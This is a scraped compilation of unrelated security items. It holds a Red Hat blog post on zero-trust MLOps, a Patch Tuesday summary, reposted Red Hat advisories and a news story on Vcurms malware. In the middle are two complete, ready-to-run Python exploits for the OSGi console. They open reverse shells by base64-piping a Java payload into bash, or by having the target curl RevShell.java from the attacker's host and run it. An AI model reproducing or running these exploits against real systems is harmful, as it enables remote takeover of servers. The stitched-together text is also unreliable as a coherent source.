Artificial intelligence (AI) has been evolving as one of the top priorities for organizations because of the increasing volume of data being generated from core data centers to the edge. Similarly, the adoption of Kubernetes in the past 10 years has resulted in improved scalability, reliability and business resilience.While Kubernetes has resulted in immense benefits, operational management and security continue to be challenging. Managing software supply chain integrity, monitoring the security of container images and runtime environments and enforcing compliance policies can be overwhelming.

Artificial intelligence (AI) has been evolving as one of the top priorities for organizations because of the increasing volume of data being generated from core data centers to the edge. Similarly, the adoption of Kubernetes in the past 10 years has resulted in improved scalability, reliability and business resilience.

While Kubernetes has resulted in immense benefits, operational management and security continue to be challenging. Managing software supply chain integrity, monitoring the security of container images and runtime environments and enforcing compliance policies can be overwhelming.

Organizations frequently experience challenges scaling AI and machine learning (AI/ML) use cases for enterprise-wide adoption. MLOps helps teams provision infrastructure, stage models, manage dependencies, orchestrate model calling and serve AI models in a scalable fashion to accelerate the time-to-value of AI/ML applications for organizations. MLOps has been gaining momentum with Kubernetes adoption for data models similar to how DevOps has been adopted for app development, providing self-healing, auto scalability, automated pipeline and many more capabilities.

An MLOps process constitutes five major steps:

1.  Data acquisition from different sources
2.  Data tuning and data validation
3.  Data model training
4.  Deploying models at scale to enable AI applications
5.  Continuous monitoring and modification of models and AI applications

Red Hat OpenShift AI is built using open source technologies, providing a flexible and scalable MLOps platform with tools to build, deploy and manage AI-enabled applications. It brings together a powerful suite of tools designed to make the process of fine-tuning and serving foundation models more seamless, scalable and efficient, simplifying the end-to-end data science process from model development to deployment.

Red Hat OpenShift Platform Plus serves as a foundation for MLOps, providing a collaborative environment for data scientists, analysts, operations and developers, resulting in a 210% return on investment and 20% improvement in data scientist efficiencies. OpenShift AI and OpenShift Platform Plus provide a more secure open hybrid cloud platform to run data science models, that enables tighter controls across application development, model provenance, governance and runtime threat detection.

Kubernetes misconfigurations are serious threats against containerized AI workloads because cybercriminals can exploit these settings to breach the enterprises (for example, enabling anonymous access with high privileges or getting access to data users aren’t allowed to access). Data model security must be considered early in the MLOps pipeline, and shouldn’t be an afterthought. OpenShift Platform Plus, along with its ecosystem partners, reduces complexity by enforcing security policies and providing a zero trust architecture for running AI models on the platform.

Here are 12 aspects of OpenShift Platform Plus that make this possible:

1.  **Red Hat Enterprise Linux CoreOS**: OpenShift runs on Red Hat Enterprise Linux CoreOS, providing the same rich automated and remote upgrade features of Red Hat Enterprise Linux (RHEL) while enhancing the security and experience for developers, data scientists and operations team.
2.  **Role Based Access Control (RBAC)**: RBAC allows fine-grained control over who has various access levels to the cluster, helping define strict boundaries between different projects and blocking unauthorized resource access.
3.  **Auditing and monitoring**: OpenShift provides the ability to audit and monitor the cluster in a variety of ways, including metrics, alerts, logs, dashboards, etc.
4.  **Context-based access control**: Red Hat Single Sign-On (SSO), included in OpenShift, provides identity federation based on SAML 2.0, OpenID Connect and OAuth 2.0.
5.  **Multifactor authentication**: OpenShift supports multiple identity providers, including active directory, LDAP, OpenID connect, etc.  
6.  **Quotas and limit range**: OpenShift allows you to enforce resource quotas per project to limit the damage from denial of service attacks. The namespace segregation and storage isolation are also enforced.
7.  **Compliance Operator**: This operator allows you to assess the required compliance state of the cluster as well as provide an overview of gaps and ways to remediate them.
8.  **Real-time vulnerability management**: Red Hat Advanced Cluster Security for Kubernetes helps detect and restrict network policy based on application ports and protocols.
9.  **Encryption**: Red Hat OpenShift Data Foundation supports cluster-wide encryption (encryption-at-rest) for all the disks and multicloud Object Gateway operations in the storage cluster.
10.  **Implement version control**: Quay.io helps prevent deploying of images with known vulnerabilities.
11.  **Secrets**: OpenShift provides a mechanism to store sensitive information such as passwords, configuration files and repository credentials to help avoid data poisoning.
12.  **Regularly updated container images**: OpenShift simplifies Day-2 activities and health checks to improve the speed at which vulnerabilities are addressed.

To summarize, Red Hat provides an enterprise-ready open hybrid cloud platform enabling self-service for data scientists and developers to integrate, streamline, automate and simplify the creation of a zero trust architecture for MLOps processes. Please reach out to your account team for more information.

Arun Mamgai has more than 18 years of experience in cloud-native application modernization, cybersecurity, open-source secure supply chain, data privacy, AI/machine learning, and digital transformation while working with Fortune 1000 customers across industries. He is responsible for building strategic relationship with technology leaders and promoting Red Hat OpenShift cloud-native application development platform, cybersecurity, and software supply chain solutions.

Read full bio

Niti comes with 20 years of experience in technology at different levels. From writing ANSI C applications on embedded devices to PHP based web applications to microservices on OpenShift, she has extensive knowledge on ‘how’ and ‘why’ of building applications. 

Read full bio

Zero Trust MLOps with OpenShift Platform Plus

Microsoft patched 61 vulnerabilities in the March 2024 Patch Tuesday round, including two critical flaws in Hyper-V.

The March 2024 Patch Tuesday update includes patches for 61 Microsoft vulnerabilities. Only two of the vulnerabilities are rated critical and both of these are found in Windows Hyper-V.

Hyper-V is a hardware virtualization product that allows you to run multiple operating systems as virtual machines (VMs) on Windows. A virtual machine is a computer program that emulates a physical computer. A physical “host” computer can run multiple separate “guest” VMs that are isolated from each other, and from the host. The physical resources of the host are allocated to the VMs by a software layer called the hypervisor, which acts an intermediary between the host and guests.

The Common Vulnerabilities and Exposures (CVE) database lists publicly disclosed computer security flaws. The Hyper-V CVEs patched in this round of updates are:

CVE-2024-21407 is a Windows Hyper-V Remote Code Execution (RCE) vulnerability with a CVSS score of 8.1 out of 10. Microsoft says exploitation is less likely since this vulnerability would require an authenticated attacker on a guest to send specially crafted file operation requests to hardware resources on the VM which could result in remote code execution on the host server.

This means the attacker would need a good deal of information about the specific environment, and to take additional actions prior to exploitation to prepare the target environment.

CVE-2024-21408 is a Windows Hyper-V Denial of Service (DOS) vulnerability with a CVSS score of 5.5 out of 10. This means an attacker could target a host machine from a guest and cause it to crash or stop functioning. However, Microsoft did not provide any additional details on how this DOS could occur.

The attention for Hyper-V is remarkable since only a week earlier, VMware released security updates to fix critical sandbox escape vulnerabilities in VMware ESXi, Workstation, Fusion, and Cloud Foundation. VMware ESXi and Hyper-V are both designed to handle large-scale virtualization deployments.

Another vulnerability worth mentioning is CVE-2024-21334, which has a CVSS score of 9.8 out of 10. It’s an Open Management Infrastructure (OMI) RCE vulnerability that affects System Center Operations Manager (SCOM). SCOM is a set of tools in Microsoft’s System Center for infrastructure monitoring and application performance management. A remote, unauthenticated attacker could exploit this vulnerability by accessing the OMI instance from the internet and sending specially crafted requests to trigger a use-after-free vulnerability.

OMI is an open source technology for environment management software products for Linux and Unix-based systems. The OMI project was set up to implement standards-based management so that every device in the world can be managed in a clear, consistent, and coherent way.

Use-after-free vulnerabilities are the result of the incorrect use of dynamic memory during a program’s operation. If, after freeing a memory location, a program does not clear the pointer to that memory, an attacker can exploit the error to manipulate the program. Referencing memory after it has been freed can cause a program to crash, use unexpected values, or execute code.

Microsoft states that if the Linux machines do not need network listening, OMI incoming ports can be disabled. In other cases, customers running affected versions of SCOM (System Center Operations Manager 2019 and 2022) should update to OMI version 1.8.1-0.

**Other vendors**

Other vendors have synchronized their periodic updates with Microsoft. Here are few major ones that you may find in your environment.

**Adobe** has released security updates to address vulnerabilities in several products:

*   Adobe Experience Manager
*   Adobe Premiere Pro
*   Adobe ColdFusion
*   Adobe Bridge
*   Adobe Lightroom
*   Adobe Animate

The **Android** Security Bulletin for February contains details of security vulnerabilities for patch level 2024-03-05 or later.

**Apple** has released a security update for iOS and iPadOS to patch two zero-day vulnerabilities

**SAP** has released its March 2024 Patch Day updates.

**We don’t just report on vulnerabilities—we identify them, and prioritize action.**

Cybersecurity risks should never spread beyond a headline. Keep vulnerabilities in tow by using ThreatDown Vulnerability and Patch Management.

 Microsoft Patch Tuesday March 2024 includes critical Hyper-V flaws 

Red Hat Security Advisory 2024-1305-03 - An update for edk2 is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.4 Telecommunications Update Service. Issues addressed include a buffer overflow vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1305.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: edk2 security updateAdvisory ID:        RHSA-2024:1305-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1305Issue date:         2024-03-13Revision:           03CVE Names:          CVE-2023-45234====================================================================Summary: An update for edk2 is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.4 Telecommunications Update Service.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:EDK (Embedded Development Kit) is a project to enable UEFI support for VirtualMachines. This package contains a sample 64-bit UEFI firmware for QEMU and KVM.Security Fix(es):* edk2: Buffer overflow when processing DNS Servers option in a DHCPv6 Advertise message (CVE-2023-45234)Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-45234References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2258697

Red Hat Security Advisory 2024-1305-03

Red Hat Security Advisory 2024-1304-03 - An update for kernel is now available for Red Hat Enterprise Linux 9.2 Extended Update Support. Issues addressed include a memory exhaustion vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1304.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: kernel security, bug fix, and enhancement update  
Advisory ID:        RHSA-2024:1304-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:1304  
Issue date:         2024-03-13  
Revision:           03  
CVE Names:          CVE-2022-0480  
====================================================================

Summary: 

An update for kernel is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.

'Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The kernel packages contain the Linux kernel, the core of any Linux operating system.

Security Fix(es):

* kernel: memcg does not limit the number of POSIX file locks allowing memory exhaustion (CVE-2022-0480)

Bug Fix(es):

* [RHEL9] Add various *.peak control files to cgroup v2 (JIRA:RHEL-22850)

* RHEL9 Guest on Google Cloud panics on reading pvpanic device capabilities (JIRA:RHEL-23858)

* raid5: read data is wrong when recovery happens  (JIRA:RHEL-23882)

* md/raid5: release batch_last before waiting for another stripe_head (JIRA:RHEL-24512)

* [regression][ext4][xfstests generic/094] Error reading from file with invalid argument (JIRA:RHEL-25436)

* bpf: Fix elem_size not being set for inner maps (JIRA:RHEL-25764)

* Backport \"crypto: rsa - allow only odd e and restrict value in FIPS mode\" (JIRA:RHEL-26078)

* kernel: memcg does not limit the number of POSIX file locks allowing memory exhaustion (JIRA:RHEL-8911)

* [HPEMC RHEL 9.3 BUG] tools/power/x86 intel-speed-select crashes on systems with more than 8 sockets (JIRA:RHEL-17907)

* IPoIB: fix PKEY creation (JIRA:RHEL-22221)

* Memory corruption when using dm-crypt or dm-verity on RHEL-9 (JIRA:RHEL-26095)

* backport smartpqi: fix disable_managed_interrupts (JIRA:RHEL-26143)

* ffdhe* algortihms introduced in 0a2e5b909023 as .fips_allowed=1 lack pairwise consistency tests (JIRA:RHEL-27007)

Enhancement(s):

* s390/qeth: Fix vipa deletion (JIRA:RHEL-25813)

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2022-0480

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2049700

Red Hat Security Advisory 2024-1304-03

Red Hat Security Advisory 2024-1303-03 - An update for kernel-rt is now available for Red Hat Enterprise Linux 9.2 Extended Update Support. Issues addressed include a memory exhaustion vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1303.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: kernel-rt security and bug fix update  
Advisory ID:        RHSA-2024:1303-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:1303  
Issue date:         2024-03-13  
Revision:           03  
CVE Names:          CVE-2022-0480  
====================================================================

Summary: 

An update for kernel-rt is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.

'Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.

Security Fix(es):

* kernel: memcg does not limit the number of POSIX file locks allowing memory exhaustion (CVE-2022-0480)

Bug Fix(es):

* kernel-rt: kernel: memcg does not limit the number of POSIX file locks allowing memory exhaustion (JIRA:RHEL-8998)

* kernel-rt: update RT source tree to the latest RHEL-9.2.z7 Batch (JIRA:RHEL-26863)

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2022-0480

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2049700

Red Hat Security Advisory 2024-1303-03

Red Hat Security Advisory 2024-1278-03 - An update for kpatch-patch is now available for Red Hat Enterprise Linux 8.2 Update Services for SAP Solutions. Issues addressed include out of bounds write and use-after-free vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1278.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: kpatch-patch security update  
Advisory ID:        RHSA-2024:1278-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:1278  
Issue date:         2024-03-12  
Revision:           03  
CVE Names:          CVE-2023-3390  
====================================================================

Summary: 

An update for kpatch-patch is now available for Red Hat Enterprise Linux 8.2 Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel.

Security Fix(es):

* kernel: ktls overwrites readonly memory pages when using function splice with a ktls socket as destination (CVE-2024-0646)

* kernel: use-after-free in sch_qfq network scheduler (CVE-2023-4921)

* kernel: IGB driver inadequate buffer size for frames larger than MTU (CVE-2023-45871)

* kernel: use after free in nvmet_tcp_free_crypto in NVMe (CVE-2023-5178)

* kernel: net/sched: sch_hfsc UAF (CVE-2023-4623)

* kernel: net/sched: sch_qfq component can be exploited if in qfq_change_agg function happens qfq_enqueue overhead (CVE-2023-3611)

* kernel: nf_tables: stack-out-of-bounds-read in nft_byteorder_eval() (CVE-2023-35001)

* kernel: UAF in nftables when nft_set_lookup_global triggered after handling named and anonymous sets in batch requests (CVE-2023-3390)

* kernel: out-of-bounds write in qfq_change_class function (CVE-2023-31436)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-3390

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2192671  
https://bugzilla.redhat.com/show_bug.cgi?id=2213260  
https://bugzilla.redhat.com/show_bug.cgi?id=2220892  
https://bugzilla.redhat.com/show_bug.cgi?id=2225191  
https://bugzilla.redhat.com/show_bug.cgi?id=2237757  
https://bugzilla.redhat.com/show_bug.cgi?id=2241924  
https://bugzilla.redhat.com/show_bug.cgi?id=2244723  
https://bugzilla.redhat.com/show_bug.cgi?id=2245514  
https://bugzilla.redhat.com/show_bug.cgi?id=2253908

Red Hat Security Advisory 2024-1278-03

OSGi versions 3.7.2 and below suffer from a remote code execution vulnerability.

    #!/usr/bin/python# Exploit Title: [OSGi v3.7.2 Console RCE]# Date: [2023-07-28]# Exploit Author: [Andrzej Olchawa, Milenko Starcik,#                  VisionSpace Technologies GmbH]# Exploit Repository:#           [https://github.com/visionspacetec/offsec-osgi-exploits.git]# Vendor Homepage: [https://eclipse.dev/equinox]# Software Link: [https://archive.eclipse.org/equinox/]# Version: [3.7.2 and before]# Tested on: [Linux kali 6.3.0-kali1-amd64]# License: [MIT]## Usage:# python exploit.py --help## Examples:# python exploit.py --rhost=localhost --rport=1337 --lhost=localhost \#   --lport=4444## python exploit.py --rhost=localhost --rport=1337 --payload= \#   "curl http://192.168.100.100/osgi_test""""This is an exploit that allows to open a reverse shell connection fromthe system running OSGi v3.7.2 and earlier."""import argparseimport base64import socketdef parse():    """    This fnction is used to parse and return command-line arguments.    """    parser = argparse.ArgumentParser(        prog="OSGi-3.7.2-console-RCE",        description="This tool will let you open a reverse shell from the "                    "system that is running OSGi with the '-console' "                    "option in version 3.7.2 (or before).",        epilog="Happy Hacking! :)",    )    parser.add_argument("--rhost", dest="rhost",                        help="remote host", type=str, required=True)    parser.add_argument("--rport", dest="rport",                        help="remote port", type=int, required=True)    parser.add_argument("--lhost", dest="lhost",                        help="local host", type=str, required=False)    parser.add_argument("--lport", dest="lport",                        help="local port", type=int, required=False)    parser.add_argument("--payload", dest="custom_payload",                        help="custom payload", type=str, required=False)    parser.add_argument("--version", action="version",                        version="%(prog)s 0.1.0")    args = parser.parse_args()    if args.custom_payload and (args.lhost or args.lport):        parser.error(            "either --payload or both --lport and --rport are required.")    return argsdef generate_payload(lhost, lport, custom_payload):    """    This function generates the whole payload ready for the delivery.    """    payload = ""    if custom_payload:        payload = custom_payload        print("(*) Using custom payload.")    elif lhost and lport:        payload = \            "echo 'import java.io.IOException;import java.io.InputStream;" \            "import java.io.OutputStream;import java.net.Socket;class Rev" \            "Shell {public static void main(String[] args) throws Excepti" \            "on { String host=\"%s\";int port=%s;String cmd=\"sh\";Proces" \            "s p=new ProcessBuilder(cmd).redirectErrorStream(true).start(" \            ");Socket s=new Socket(host,port);InputStream pi=p.getInputSt" \            "ream(),pe=p.getErrorStream(), si=s.getInputStream();OutputSt" \            "ream po=p.getOutputStream(), so=s.getOutputStream();while(!s" \            ".isClosed()){while(pi.available()>0)so.write(pi.read());whil" \            "e(pe.available()>0)so.write(pe.read());while(si.available()>" \            "0)po.write(si.read());so.flush();po.flush();Thread.sleep(50)" \            ";try {p.exitValue();break;}catch (Exception e){}};p.destroy(" \            ");s.close();}}' > RevShell.java ; java ./RevShell.java" % (                lhost, lport)        print("(+) Using Java reverse shell payload.")    bash_payload = b"bash -c {echo,%s}|{base64,-d}|{bash,-i}" % (        base64.b64encode(payload.encode()))    wrapped_payload = b"fork \"%s\"\n" % (bash_payload)    return wrapped_payloaddef deliver_payload(rhost, rport, payload):    """    This function connects to the target host and delivers the payload.    It returns True if successful; False otherwise.    """    print("(*) Sending payload...")    try:        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)        sock.connect((rhost, rport))        sock.send(payload)        sock.close()    except socket.error as err:        print(f"(-) Could not deliver the payload to {rhost}:{rport}!")        print(err)        return False    return Truedef main(args):    """    Main function.    """    payload = generate_payload(args.lhost, args.lport, args.custom_payload)    success = deliver_payload(args.rhost, args.rport, payload)    if success:        print("(+) Done.")    else:        print("(-) Finished with errors.")if __name__ == "__main__":    main(parse())

OSGi 3.7.2 Remote Code Execution

OSGi versions 3.8 through 3.18 suffer from a remote code execution vulnerability.

    #!/usr/bin/python# Exploit Title: [OSGi v3.8-3.18 Console RCE]# Date: [2023-07-28]# Exploit Author: [Andrzej Olchawa, Milenko Starcik,#                  VisionSpace Technologies GmbH]# Exploit Repository:#           [https://github.com/visionspacetec/offsec-osgi-exploits.git]# Vendor Homepage: [https://eclipse.dev/equinox]# Software Link: [https://archive.eclipse.org/equinox/]# Version: [3.8 - 3.18]# Tested on: [Linux kali 6.3.0-kali1-amd64]# License: [MIT]## Usage:# python exploit.py --help## Example:# python exploit.py --rhost=192.168.0.133 --rport=1337 --lhost=192.168.0.100 \#                                                      --lport=4444"""This is an exploit that allows to open a reverse shell connection fromthe system running OSGi v3.8-3.18 and earlier."""import argparseimport socketimport sysimport threadingfrom functools import partialfrom http.server import BaseHTTPRequestHandler, HTTPServer# Stage 1 of the handshake messageHANDSHAKE_STAGE_1 = \    b"\xff\xfd\x01\xff\xfd" \    b"\x03\xff\xfb\x1f\xff" \    b"\xfa\x1f\x00\x74\x00" \    b"\x37\xff\xf0\xff\xfb" \    b"\x18"# Stage 2 of the handshake messageHANDSHAKE_STAGE_2 = \    b"\xff\xfa\x18\x00\x58" \    b"\x54\x45\x52\x4d\x2d" \    b"\x32\x35\x36\x43\x4f" \    b"\x4c\x4f\x52\xff\xf0"# The buffer of this size is enough to handle the telnet handshakeBUFFER_SIZE = 2 * 1024class HandlerClass(BaseHTTPRequestHandler):    """    This class overrides the BaseHTTPRequestHandler. It provides a specific    functionality used to deliver a payload to the target host.    """    _lhost: str    _lport: int    def __init__(self, lhost, lport, *args, **kwargs):        self._lhost = lhost        self._lport = lport        super().__init__(*args, **kwargs)    def _set_response(self):        self.send_response(200)        self.send_header("Content-type", "text/html")        self.end_headers()    def do_GET(self):  # pylint: disable=C0103        """        This method is responsible for the playload delivery.        """        print("Delivering the payload...")        self._set_response()        self.wfile.write(generate_revshell_payload(            self._lhost, self._lport).encode('utf-8'))        raise KeyboardInterrupt    def log_message(self, format, *args):  # pylint: disable=W0622        """        This method redefines a built-in method to suppress        BaseHTTPRequestHandler log messages.        """        returndef generate_revshell_payload(lhost, lport):    """    This function generates the Revershe Shell payload that will    be executed on the target host.    """    payload = \        "import java.io.IOException;import java.io.InputStream;" \        "import java.io.OutputStream;import java.net.Socket;" \        "class RevShell {public static void main(String[] args) " \        "throws Exception { String host=\"%s\";int port=%d;" \        "String cmd=\"sh\";Process p=new ProcessBuilder(cmd)." \        "redirectErrorStream(true).start();Socket s=new Socket(host,port);" \        "InputStream pi=p.getInputStream(),pe=p.getErrorStream(), " \        "si=s.getInputStream();OutputStream po=p.getOutputStream()," \        "so=s.getOutputStream();while(!s.isClosed()){while(pi.available()" \        ">0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());" \        "while(si.available()>0)po.write(si.read());so.flush();po.flush();" \        "Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};" \        "p.destroy();s.close();}}\n" % (            lhost, lport)    return payloaddef run_payload_delivery(lhost, lport):    """    This function is responsible for payload delivery.    """    print("Setting up the HTTP server for payload delivery...")    handler_class = partial(HandlerClass, lhost, lport)    server_address = ('', 80)    httpd = HTTPServer(server_address, handler_class)    try:        print("[+] HTTP server is running.")        httpd.serve_forever()    except KeyboardInterrupt:        print("[+] Payload delivered.")    except Exception as err:  # pylint: disable=broad-except        print("[-] Failed payload delivery!")        print(err)    finally:        httpd.server_close()def generate_stage_1(lhost):    """    This function generates the stage 1 of the payload.    """    stage_1 = b"fork \"curl http://%s -o ./RevShell.java\"\n" % (        lhost.encode()    )    return stage_1def generate_stage_2():    """    This function generates the stage 2 of the payload.    """    stage_2 = b"fork \"java ./RevShell.java\"\n"    return stage_2def establish_connection(rhost, rport):    """    This function creates a socket and establishes the connection    to the target host.    """    print("[*] Connecting to OSGi Console...")    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)    sock.connect((rhost, rport))    print("[+] Connected.")    return sockdef process_handshake(sock):    """    This function process the handshake with the target host.    """    print("[*] Processing the handshake...")    sock.recv(BUFFER_SIZE)    sock.send(HANDSHAKE_STAGE_1)    sock.recv(BUFFER_SIZE)    sock.send(HANDSHAKE_STAGE_2)    sock.recv(BUFFER_SIZE)    sock.recv(BUFFER_SIZE)def deliver_payload(sock, lhost):    """    This function executes the first stage of the exploitation.    It triggers the payload delivery mechanism to the target host.    """    stage_1 = generate_stage_1(lhost)    print("[*] Triggering the payload delivery...")    sock.send(stage_1)    sock.recv(BUFFER_SIZE)    sock.recv(BUFFER_SIZE)def execute_payload(sock):    """    This function executes the second stage of the exploitation.    It sends payload which is responsible for code execution.    """    stage_2 = generate_stage_2()    print("[*] Executing the payload...")    sock.send(stage_2)    sock.recv(BUFFER_SIZE)    sock.recv(BUFFER_SIZE)    print("[+] Payload executed.")def exploit(args, thread):    """    This function sends the multistaged payload to the tareget host.    """    try:        sock = establish_connection(args.rhost, args.rport)        process_handshake(sock)        deliver_payload(sock, args.lhost)        # Join the thread running the HTTP server        # and wait for payload delivery        thread.join()        execute_payload(sock)        sock.close()        print("[+] Done.")    except socket.error as err:        print("[-] Could not connect!")        print(err)        sys.exit()def parse():    """    This fnction is used to parse and return command-line arguments.    """    parser = argparse.ArgumentParser(        prog="OSGi-3.8-console-RCE",        description="This tool will let you open a reverse shell from the "                    "system that is running OSGi with the '-console' "                    "option in versions between 3.8 and 3.18.",        epilog="Happy Hacking! :)",    )    parser.add_argument("--rhost", dest="rhost",                        help="remote host", type=str, required=True)    parser.add_argument("--rport", dest="rport",                        help="remote port", type=int, required=True)    parser.add_argument("--lhost", dest="lhost",                        help="local host", type=str, required=False)    parser.add_argument("--lport", dest="lport",                        help="local port", type=int, required=False)    parser.add_argument("--version", action="version",                        version="%(prog)s 0.1.0")    return parser.parse_args()def main(args):    """    Main fuction.    """    thread = threading.Thread(        target=run_payload_delivery, args=(args.lhost, args.lport))    thread.start()    exploit(args, thread)if __name__ == "__main__":    main(parse())

OSGi 3.18 Remote Code Execution

By Waqas
Another day, another malware exploiting cloud services to steal sensitve data from unsuspecting Windows users.
This is a post from HackRead.com Read the original post: New Vcurms Malware Targets Popular Browsers for Data Theft

Cybersecurity researchers at Fortinet’s FortiGuard Labs have discovered a new threat called Vcurms malware targeting popular browsers and apps for login and data theft. They urge security updates and caution with emails.

Fortinet’s FortiGuard Labs recently uncovered a new cybersecurity threat: a malware known dubbed “Vcurms.” The attackers behind Vcurms malware have employed sophisticated tactics, using email as their command and control center and leveraging public services such as AWS and GitHub to store the malicious software. Additionally, they have employed a commercial protector to evade detection, indicating a concerted effort to maximize the malware’s impact.

****Targeting Java Platforms****

This campaign primarily targets platforms with Java installed, posing a risk to any organization utilizing such systems. The severity of the threat cannot be understated, as successful infiltration grants attackers full control over compromised systems.

****Tactics and Techniques: Spreading Vcurms****

The modus operandi of the attackers involves luring users to download a malicious Java downloader, which serves as a vector for spreading Vcurms and STRRAT, a trojan previously found to be **posing as fake ransomware infection** to steal data. These malicious emails typically masquerade as legitimate requests, urging recipients to verify payment information and download harmful files hosted on AWS.

****Phishing Traits****

Once downloaded, the malware exhibits classic phishing traits, employing spoofed names and obfuscated strings to disguise its nefarious nature. Notably, it utilizes a class named “DownloadAndExecuteJarFiles.class” to facilitate the downloading and execution of additional JAR files, further expanding the attacker’s foothold.

The Remote Access Trojan (**RAT**) component of Vcurms communicates with its command and control center via email, demonstrating a concerning level of sophistication. It establishes persistence by replicating itself into the Startup folder and employs various techniques to identify and monitor victims, including keylogging and password recovery functionalities.

****Targeting Popular Browsers and Apps****

Furthermore, the malware employs advanced obfuscation techniques, such as the **Branchlock obfuscator**, to evade detection and analysis. Despite these challenges, cybersecurity researchers continue to develop methods for deobfuscating and understanding the inner workings of Vcurms.

Vcurms also exhibits notable similarities with the **Rude Stealer malware** but distinguishes itself through its unique transmission methods and targeted data acquisition. It prioritizes stealing sensitive information from popular browsers like Chrome, Brave, Edge, Vialdi, Opera, OperaGX, Firefox, etc. and applications, including Discord and Steam.

In response to this threat, FortiGuard Labs in their **blog post**, recommend proactive measures, including the deployment of updated security solutions and network segmentation. Additionally, maintaining vital password practices and exercising caution when handling email attachments are crucial steps in mitigating the risk of Vcurms infection.

Commenting on this, **Jason Soroko**, Senior Vice President of Product at Sectigo, emphasizes the importance of authentication methods in combating malware attacks.

_“_Malware writers are benefiting from the cloud and that shouldn’t surprise anyone. RAT malware typically harvests whatever it can, and the new VCURMS and STRRAT remote access trojans seem to have one or more keyloggers,_“_ Jason warned. _“_This technique has been around for quite some time and is yet another example of why stronger authentication methods than simply a username and password are necessary._“_

1.  ToxicEye RAT hits Telegram app to spy, steal user data
2.  Fake Skype, Zoom, Google Meet Sites Infecting Devices with RATs
3.  AsyncRAT Infiltrates Key US Infrastructure Through GIFs and SVGs
4.  BRATA Android malware factory resets phones after stealing funds
5.  New Bifrost RAT Variant Targets Linux Devices, Mimics VMware Domain

New Vcurms Malware Targets Popular Browsers for Data Theft

Apple and Microsoft recently released software updates to fix dozens of security holes in their operating systems. Microsoft today patched at least 60 vulnerabilities in its Windows OS. Meanwhile, Apple's new macOS Sonoma addresses at least 68 security weaknesses, and its latest updates for iOS fixes two zero-day flaws.

